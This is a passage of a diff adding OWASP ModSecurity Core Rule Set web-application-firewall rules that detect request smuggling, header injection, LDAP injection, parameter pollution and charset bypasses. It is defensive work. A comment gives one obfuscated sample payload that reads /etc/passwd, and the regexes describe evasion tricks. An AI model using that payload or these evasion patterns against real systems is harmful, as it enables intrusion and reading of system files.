setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + +# +# PL 3: This is a stricter sibling of 920270. Ascii range: Printable characters in the low range +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \ + "id:920272,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (outside of printable chars below ascii 127)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# PL3: The little known x-up-devcap-post-charset request header can be used to submit +# a request with a different encoding as an alternative to the charset parameter in +# the Content-Type header. This can be used to circumvent charset restrictions on +# the Content-Type header in ASP.NET. +# Note that this only works in combination with a User-Agent prefix. +# +# This rule is based on a blog post by Soroush Dalili at +# https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/ +# +SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ + "id:920490,\ + phase:1,\ + block,\ + t:none,\ + msg:'Request header x-up-devcap-post-charset detected in combination with prefix \'UP\' to User-Agent',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'language-aspnet',\ + tag:'platform-windows',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ + "t:none,\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# Cache-Control Request Header whitelist +# +# -=[ Rule Logic ]=- +# This rule aims to strictly whitelist the Cache-Control request header +# values and to blocks all violations. This should be useful to intercept +# "bad bot" and tools that impersonate a real browser but with wrong request +# header setup. +# +# The regular expression used on this rule tries to match multiple directives +# in a single value, for example: "max-stale=1, max-age=2". This leads us to +# use a regular expression that accepts a trailing comma to keep compatibility +# with all regex engines and not PCRE only. For example: "max-stale=1, max-age=2, " +# +# Moreover, this regular expression allows duplicate directives sequence like: +# "max-stale, max-stale=1, no-cache, no-cache". +# +# Standard Cache-Control directives that can be used by the client: +# - max-age= +# - max-stale[=] +# - min-fresh= +# - no-cache +# - no-store +# - no-transform +# - only-if-cached +# +# References: +# - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control +# - https://regex101.com/r/CZ0Hxu/22 +# +SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ + "id:920510,\ + phase:1,\ + block,\ + t:none,\ + msg:'Invalid Cache-Control request header',\ + logdata:'Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'header-whitelist',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \ + "setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + +# +# This is a stricter sibling of rule 920200 +# + +SecRule REQUEST_BASENAME "@endsWith .pdf" \ + "id:920202,\ + phase:2,\ + block,\ + t:none,\ + msg:'Range: Too many fields for pdf request (6 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + "setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}'" + + +# +# This is a stricter sibling of 920270. +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90,95,97-122" \ + "id:920273,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# +# This is a stricter sibling of 920270. +# +SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ + "id:920274,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request headers (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# +# This is a stricter sibling of 920270. +# The 'Sec-Fetch-User' header may contain the '?' (63) character. +# Therefore we exclude this header from rule 920274 which forbids '?'. +# https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user +# +SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63,65-90,95,97-122" \ + "id:920275,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request headers (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# -=[ Abnormal Character Escapes ]=- +# +# [ Rule Logic ] +# Consider the following payload: arg=cat+/e\tc/pa\ssw\d +# Here, \s and \d were only used to obfuscate the string passwd and a lot of +# parsers will silently ignore the non-necessary escapes. The case with \t is +# a bit different though, as \t is a natural escape for the TAB character, +# so we will avoid this (and \n, \r, etc.). +# +# This rule aims to detect non-necessary, abnormal escapes. You could say it is +# a nice way to forbid the backslash character where it is not needed. +# +# This is a new rule at paranoia level 4. We expect quite a few false positives +# for this rule and we will later evaluate if the rule makes any sense at all. +# The rule is redundant with 920273 and 920274 in PL4. But if the rule proofs +# to be useful and false positives remain at a reasonable level, then it might +# be shifted to PL3 in a future release, where it would be the only rule +# covering the backslash escape. +# +# We forbid backslashes followed by a list of basic ascii characters - unless +# the backslash is preceded by another backslash. +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdeghijklmpqwxyz123456789]" \ + "id:920460,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + log,\ + msg:'Abnormal character escapes in request',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/4',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/153/267',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-921-PROTOCOL-ATTACK.conf new file mode 100644 index 000000000..fe5d4f68a --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-921-PROTOCOL-ATTACK.conf @@ -0,0 +1,460 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ HTTP Request Smuggling ]=- +# +# [ Rule Logic ] +# This rule looks for a HTTP / WEBDAV method name in combination with the word http/\d or a CR/LF character. +# This would point to an attempt to inject a 2nd request into the request, thus bypassing +# tests carried out on the primary request. +# +# [ References ] +# http://projects.webappsec.org/HTTP-Request-Smuggling +# +SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+(?:\/|\w)[^\s]*(?:\s+http\/\d|[\r\n])" \ + "id:921110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + msg:'HTTP Request Smuggling Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ HTTP Response Splitting ]=- +# +# [ Rule Logic ] +# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters. +# These characters may cause problems if the data is returned in a respones header and +# may be interpreted by an intermediary proxy server and treated as two separate +# responses. +# +# [ References ] +# http://projects.webappsec.org/HTTP-Response-Splitting +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]\W*?(?:content-(?:type|length)|set-cookie|location):\s*\w" \ + "id:921120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:lowercase,\ + msg:'HTTP Response Splitting Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \ + "id:921130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + msg:'HTTP Response Splitting Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ HTTP Header Injection ]=- +# +# [ Rule Logic ] +# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters, +# on their own or in combination with header field names. +# These characters may cause problems if the data is returned in a response header +# and interpreted by the client. +# The rules are similar to rules defending against the HTTP Request Splitting and +# Request Smuggling rules. +# +# [ References ] +# https://en.wikipedia.org/wiki/HTTP_header_injection +# +SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ + "id:921140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via headers',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/273',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# Detect newlines in argument names. +# Checking for GET arguments has been moved to paranoia level 2 (921151) +# in order to mitigate possible false positives. +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule ARGS_NAMES "@rx [\n\r]" \ + "id:921150,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\s*:" \ + "id:921160,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# -=[ HTTP Splitting ]=- +# +# This rule detect \n or \r in the REQUEST FILENAME +# Reference: https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) +# +SecRule REQUEST_FILENAME "@rx [\n\r]" \ + "id:921190,\ + phase:1,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'HTTP Splitting (CR/LF in request filename detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ LDAP Injection ]=- +# +# [ Rule Logic ] +# +# This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada +# and regex writing by Denis Kolegov. +# +# [ References ] +# * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf +# * https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ +# * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \ + "id:921200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,\ + msg:'LDAP Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-ldap',\ + tag:'platform-multi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/136',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# This prevents bypasses targeting the Modsecurity recommended rules controlling which body processor is used. +# +# Regular expression generated from util/regexp-assemble/data/921421.data. +# To update the regular expression run the following shell script +# (consult util/regexp-assemble/README.md for details): +# util/regexp-assemble/regexp-assemble.py update 921421 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s,]+[;\s,].*?(?:(?:application(?:\/soap\+|\/)|text\/)xml|application\/(?:.+[+])?json)" \ + "id:921421,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + + +# Detect newlines in GET argument values. +# These may point to a HTTP header injection attack, but can also sometimes +# occur in benign query parameters. +# +# See also: rule 921140, 921150 +# +SecRule ARGS_GET "@rx [\n\r]" \ + "id:921151,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# +# [ References ] +# * See rule 921422 +# +# Regular expression generated from util/regexp-assemble/data/921422.data. +# To update the regular expression run the following shell script +# (consult util/regexp-assemble/README.md for details): +# util/regexp-assemble/regexp-assemble.py update 921422 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s,]+[;\s,].*?\b(?:(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)|(text|multipart|application)|(\/|\+))\b" \ + "id:921422,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# +# + +# Forbid Request Range Header +# +# It is possible abuse the HTTP Request Range Header to leak error pages +# and other information in very small snippets. +# The easiest way to fight this is to deny the use of this header. +# This is a viable option since the header is only used in rare circumstances +# anymore. +# If it is necessary to use it in a certain setup, then it is best to +# create a rule exclusion for a given URI and this rule ID as a workaround. +# +SecRule &REQUEST_HEADERS:Range "@gt 0" \ + "id:921230,\ + phase:1,\ + block,\ + t:none,\ + msg:'HTTP Range Header detected',\ + logdata:'Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# These rules look for multiple parameters with the same name. +# 921170 counts the occurrences of the individual parameters. +# 921180 checks if any counter is > 1. +# +# One HPP attack vector is to try evade signature filters by distributing the +# attack payload across multiple parameters with the same name. +# This works as many security devices only apply signatures to individual +# parameter payloads, however the back-end web application may (in the case +# of ASP.NET) consolidate all of the payloads into one thus making the +# attack payload active. +# +# [ References ] +# http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html +# https://capec.mitre.org/data/definitions/460.html +# +SecRule ARGS_NAMES "@rx ." \ + "id:921170,\ + phase:2,\ + pass,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'" + +SecRule TX:/paramcounter_.*/ "@gt 1" \ + "id:921180,\ + phase:2,\ + pass,\ + msg:'HTTP Parameter Pollution (%{TX.1})',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \ + "capture,\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-921-PROTOCOL-ATTACK" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-922-MULTIPART-ATTACK.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-922-MULTIPART-ATTACK.conf new file mode 100644 index 000000000..13847061d --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-922-MULTIPART-ATTACK.conf @@ -0,0 +1,92 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + +# This file is to address the 3UWMWA6W vulnerability. +# It requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports +# of the security fixes in these versions) or a compatible engine supporting these changes. +# +# If you cannot upgrade ModSecurity, this file will cause ModSecurity to fail to start. +# In that case, you can temporarily delete this file. However, you will be missing +# protection from these rules. Therefore, we recommend upgrading your engine instead. + +# The rules in this file will be part of the 920 / 921 in the future. + +# Only allow specific charsets when using "_charset_" +# Note: this is in phase:2 because these are headers that come in the body +SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \ + "id:922100,\ + phase:2,\ + block,\ + t:none,\ + msg:'Multipart content type global _charset_ definition is not allowed by policy',\ + logdata:'Matched Data: %{ARGS._charset_}',\ + tag:'application-multi',\ + tag:'language-multi',\ + 